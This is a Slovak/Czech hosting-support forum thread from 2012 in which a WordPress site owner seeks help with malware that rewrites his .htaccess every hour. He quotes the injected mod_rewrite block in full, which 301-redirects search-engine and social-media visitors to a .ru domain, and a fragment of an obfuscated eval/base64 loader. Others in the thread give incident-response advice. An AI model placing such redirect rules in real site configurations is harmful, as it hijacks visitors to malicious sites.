Prepisovanie .htaccess

zerovic · 2012-08-01 18:08:00

Aloha...

Mam strasny problem:

Na mojich domenach s wordpressom mi neustale nieco vklada do .htaccess
bordel ohladom presmerovania s inych stranok. Napr s google, facebook,
twitter atd. Na jednej prevadzkujem shop a nerad by som to tam trieskal
nanovo. Jedna sa o domeny http://www.mdbuilding.eu a http://www.newbies.sk .
Skusal som rozne anti blah blah scannery ale nic mi nenajdu. Deje sa to na
roznych domenach. MDBuilding som cely zhodil nainstaloval na novo a robi to
aj tak. Pomenil som hesla, premazal pluginy proste vsetko, co som ohladom
toho vygooglil. Pridava mi to tam v cca hodinovom intervale. Po pridani stranka
presmerovava niekam do Mother Russia a odtial na google. Robi to aj na nanovo
nahodenom wordpresse bez doinstalovanych pluginov a na roznych domenach s
roznou verziou wordpressu. Na newbies.sk je 3.3.2 a na MDBuilding je 3.3.1.
Wordpress updatnut na 3.4-ku nemozem kvoli lokalizacii.

Co sa tyka pluginov - slapalo to v pohode, nic som nedoinstalovaval a zrazu prask
newbies nejde, na mdbuildingu to po chvili robi aj pri novej instalacii bez doinstalovanych
modulov.

Ma s podobnym problemom niekto skusenosti? Neviem si rady , som zufaly a dosiel mi
energy drink... Za uspesne riesenie ponukam odmenu - napr. mierne otupeneho
ostrieza alebo zelezne drievko

Pridava to tento bordel pravidelne kazdu hodinu:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|youtube|wikipedia|excite|altavista|msn|netscape|aol|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|linkedin|flickr|liveinternet|filesearch|yell|openstat|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv|infospace)\.(.*)
RewriteRule ^(.*)$ http://fitnescorp.ru/shurimuri?5 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://fitnescorp.ru/shurimuri?5 [R=301,L]
</IfModule>

l564 · 2012-08-01 18:15:39

Máš virus v PC, prohledej si zde zdejší témata.

[list=]
[*]Vyčisti si počítač[/*]
[*]Změn naprosto všechny hesla, FTP, WebAdmin, Email, atp...[/*]
[*]Obnov si čístou zálohu bez viru, a nahraj jí zpět.[/*][/list]

zerovic · 2012-08-01 18:18:35

Dakujem, ale vsetky tieto kroky som uz urobil a robi to stale...

kksmirice · 2012-08-01 18:19:47

<a class="postlink-local" href="http://podpora.endora.cz/viewtopic.php?f=28&t=5919&p=33281#p33281">viewtopic.php?f=28&t=5919&p=33281#p33281</a>

Opět Belgie 212.71.10.196

zerovic · 2012-08-02 01:08:17

Nom... Ziadny podobny subor som nenasiel, teda filezilla nenasla + Tamten fix slape na Joomlu (aj tak dakujem )... Vyskusame co spravi bulletproof .htaccess... Zostava len dufat ze zaberie... Pripadne neviete niekto ako vyhladavat (nie rucne) v suboroch stranky? Researchom som to dotiahol az po konkretny retazec "eval(base64_decode("CglpZiAoc3RyaXN0cigkX1NFUlZFUltIV..." ktory mi to robi, ale nemozem ho ani za svet nikde najst...

JF · 2012-08-02 01:59:07

U WP to môže byť iný súbor ako u joomly.

zerovic · 2012-08-02 06:07:21

Nom takze update:

- Prehnal som si laptop MalwareBytesom a Nodom - Negative SIR!
- Precistil prehliadace, tempy atd.
- Celu stranku som zhodil.
- Premazol vsetko co mi to dovolilo.
- Vo webadmine odstranil databazu aj s uzivatelom.
- pomenil hesla.
- Nahodil nanovo wordpress a nechal ho aktualizovat.
- Nainstaloval temu - business vyhladavana rovno cez WP.
- Prepisal styry obrazky - neuploadoval som cez wordpress ale FTP (timthumb to asi nebude).
- Doinstaloval dva svinsky rozsirene pluginy - pred instalaciou som samozrejme googlil, ci snimi nemaju ludia podobne problemy - contact form 7 a google maps widget(vyskusam ich este premaznut, a nahodit tam s fresh zalohy novy htaccess)
- Spravil par clankov a v priebehu hodiny...

:twisted: Je to v prdeli :twisted:

Znova to iste, stym ze som si isiel porovnat htaccess na tretiu domenu a hadajte co? je vprdeli aj ta :evil:

Neni tu nejaky kuzelnik ktory sa nahodou uz niekde docital, co to moze sposobovat? Tie dva moduly, co som nahodil na tej dalsej sajte nemam. Ked si to tak porovnam, tak vsetky tri nemaju ani jeden spolocny.

kksmirice · 2012-08-02 06:35:24

JF napsal:

U WP to môže byť iný súbor ako u joomly.

Odkaz jsem dával proto, že většina hledá něco a neví co a hlavně ten soubor je skrytý! Samozřejmě, že soubor se může měnit (název) a také je jiné přesměrování ale vše je stále ze stejného rozsahu IP.

Napadeny jsou systémy phpBB, Joomla! a teď i WP. Nějak mi neštymuje co vše je může spojovat, kde hledat tu díru a tím odstranit příčinu.

Možná by bylo vhodné vyhledat pomoc na forum.viry.cz a vložit log daného PC (popř. všech, které se na FTP připojují). Nezbytnou podmínkou úspěšné komunikace se členy podpory na tomto fóru je legální SW!!!

Určitě bych se nespoléhal na to, že jej žádné AV programy neodhalili, obzvláště po té, kdy se po čisté instalaci objeví znovu.
Viry se dokáží maskovat...

zerovic · 2012-08-02 09:59:52

Skusal dokonca aj na total 000. aj tak to prepise a prava zmeni na 444 dost hardcore.

Pomimo:
Na test som hodil Kubuntu Distro na desktop a z laptopu, cez ktory makam, som vytiahol baterku(solid paranoya)
Nahodil som na test domenu blackmuscattest.8u.cz nechal vsetko na defaulte a stalo sa to iste znova - cerstvo nainstalovane vsetko - od kompu po stranku.

zerovic · 2012-08-02 11:34:48

Hopa berem spat... Na jeden komp som zabudol...

JF · 2012-08-02 11:41:14

bartama napsal:

Zkoušel jste změnit práva pro přístup k .htaccess?

toto nepomáha, tiež som mal rovnakú chybu na inom webhostingu ale u Joomly a práva nastavené na 100 a i tak bol súbor prepísaný

JF · 2012-08-02 11:46:01

bartama napsal:

JF napsal:
bartama napsal:
Zkoušel jste změnit práva pro přístup k .htaccess?
toto nepomáha, tiež som mal rovnakú chybu na inom webhostingu ale u Joomly a práva nastavené na 100 a i tak bol súbor prepísaný
Zajímavé, přepsat něco k čemu nemám práva.

Ak to prepisuješ pomocou php skriptu tak si práva urobíš behom chvíle a prepíšeš čokoľvek k čomu má php skript prístup či sa mýlim?

zerovic · 2012-08-02 11:49:38

Jop, ale ako to vyriesit ? Najhorsie je, ze mi to sposobuje iny komp(neni moj ) a ani natom nic anti mallware nenasiel Reinstall Widle? "Nehrozi" - skoro citacia, co som dostal naspat...

JF · 2012-08-02 11:52:24

bartama napsal:

Ak to prepisuješ pomocou php skriptu tak si práva urobíš behom chvíle a prepíšeš čokoľvek k čomu má php skript prístup či sa mýlim?
PHP skript může měnit práva, ale neměl by mít možnost měnit práva souborům, která je mají vyšší než on samotný ne? Nebo ne?

no v tomto niesom tak zbehlý, takže neviem. Viem len to že to dokáže zmeniť! teda aspoň na websupporte a dosť možné že aj tu, keď už x ľudí to pocítilo

kksmirice · 2012-08-02 12:24:06

zerovic napsal:

Jop, ale ako to vyriesit ? Najhorsie je, ze mi to sposobuje iny komp(neni moj ) a ani natom nic anti mallware nenasiel Reinstall Widle? "Nehrozi" - skoro citacia, co som dostal naspat...

Z toho PC je přístup k FTP???

Změnit hesla a nedovolit mu přístup na FTP a do databází... Myslíte, že pouhým načtením stránky se na FTP dostane??? Nesmysl, že? To by museli být zavirovány všechny stránky, které jsou na webu...

zerovic · 2012-08-02 13:59:21

Ano ten laptop ma pristup na ftp aj do administracie a odrazal som sa od toho ze najednom z kompov je nejaky mallware(tvrdenie vyssie) a kedze moj bol vypnuty, tamten bezal a novu stranku som nahadzoval z linuxu tak mi nic ine logicky nepasovalo...

Nic kaslat nato. Dakujem za info a tipy. Budem asi muset pockat na nove Av definicie. Asi by sa to mohlo LOCKNUT...

Update: ako tak pozeram tak to uz neredirectuje... Neviem komu sa mam podakovat ale THX... Moze mi pripadne dotycna osoba, ktora to vyriesila napisat PM?

kksmirice · 2012-08-02 14:23:43

Logika věci:
Pokud se něco cizího dostane do složek na webu, znamená to, že získal přístupové údaje. Které a kam těžko soudit.

Jak se dostanu na web?
1. administrace účtu;
2. FTP přístup do složek webu;
3. přístupové údaje do databáze, resp. phpMyAdmin.

Nutně tedy musím počítat s nejhorší variantou - útočník zná veškerá hesla!
Obrana:
Nejjednodušší varianta - řádně zkontrolovat PC z kterého přistupuji na web, smazat vše z webu včetně databáze (může, ale také nemusí, tam být škodlivý kód uložen, který se spouští špatně ošetřeným výstupem - např. echo $polozka_databaze) a včetně skrytých souborů!
Po provedené kontrole PC (a jeho případném vyčištění) změnit veškeré přístupové údaje! Nainstalovat čistou instalaci produktu (prezentace) a po důkladné analýze databáze (AV program nezjistí spuštění scriptu!) nahrát data.

Pokud uděláte jenom něco napůl je to naprosto zbytečná práce a ztráta času.

Co z uvedeného vyplývá?
Pravidelně provádět zálohy svého webu (tedy alespoň, pokud Vám na něm záleží) a to ne jen pouhým přepsáním staré zálohy, ale mít alespoň o jednu zálohu nižší.

Jak říkám... Největším nebezpečím pro IT je člověk!

zerovic · 2012-08-02 14:49:29

Jop podobne som sa nato snazil ist aj ja, az na tie databazy... Tam som hesla nemenil. hesla som menil do administracie aj na sajtu, takisto mail a FTP... Komp som precistil - prehliadace, tempy, registre - natotal. Vsetky disky som preskenoval - Nodom, MalwareBytes antimallwarom, COMODO Antivirusom a HijackThisom z ktoreho vystup som uploadoval na rozbor. Cele ftp-cko som mazol cez FileZillu(so zapnutym zobrazovanim skrytych suborov). Mazol som databazu a uzivatela. A odznova som nechal nainstalovat Wordpress, aktualizoval ho a nahodil len temu a dva widgety. Potom co mi to spravilo znova som nainstaloval Linux a vyskusal to znova. Robilo to dalej... Az na tie databazy som isiel rovnako... Dokladna analyza databazy? Databazy som sa snazil otvorit cez phpMyAdmin ale zobrazilo mi len jednu - z Joomly. Z databaz som sprosty a do obsahu prd vidim... Vsetky tie veci som googlil a postupoval podla ludi, ktorym to robilo to iste... Nie kazdy sa zaobera administraciou a podobne - niektori to maju ako hobby Cize v podstate furt je to polovicna praca A potom sa musia blbo vypytovat na fore, googlit ako ozivot, 24h nespat a dufat ze to do piatku kedy idu k moru bude nejak v pohode, aby im ludia nevyvolavali coto toto aky google...

kksmirice · 2012-08-02 15:00:12

pošli mi na e-mail zálohu té databáze a zkusím se mrknout jestli něco podezřelé tam je. Netvrdím, že tam musí být.

Já na to jdu právě tou logikou věci, snažit se eliminovat přístup jiných... Kolik ftp účtů tam je??? Je logické, že pokud obsah webu bude "zavirovaný" a já změním přístupové údaje, je dosti pravděpodobné, že mi je znovu odhalí...
Nejsem žádným antivirovým specialistou...

#1 2012-08-01 18:08:00

Re: Prepisovanie .htaccess

#2 2012-08-01 18:15:39

Re: Prepisovanie .htaccess

#3 2012-08-01 18:18:35

Re: Prepisovanie .htaccess

#4 2012-08-01 18:19:47

Re: Prepisovanie .htaccess

#5 2012-08-02 01:08:17

Re: Prepisovanie .htaccess

#6 2012-08-02 01:59:07

Re: Prepisovanie .htaccess

#7 2012-08-02 06:07:21

Re: Prepisovanie .htaccess

#8 2012-08-02 06:35:24

Re: Prepisovanie .htaccess

#9 2012-08-02 09:59:52

Re: Prepisovanie .htaccess

#10 2012-08-02 11:34:48

Re: Prepisovanie .htaccess

#11 2012-08-02 11:41:14

Re: Prepisovanie .htaccess

#12 2012-08-02 11:46:01

Re: Prepisovanie .htaccess

#13 2012-08-02 11:49:38

Re: Prepisovanie .htaccess

#14 2012-08-02 11:52:24

Re: Prepisovanie .htaccess

#15 2012-08-02 12:24:06

Re: Prepisovanie .htaccess

#16 2012-08-02 13:59:21

Re: Prepisovanie .htaccess

#17 2012-08-02 14:23:43

Re: Prepisovanie .htaccess

#18 2012-08-02 14:49:29

Re: Prepisovanie .htaccess

#19 2012-08-02 15:00:12

Re: Prepisovanie .htaccess

Zápatí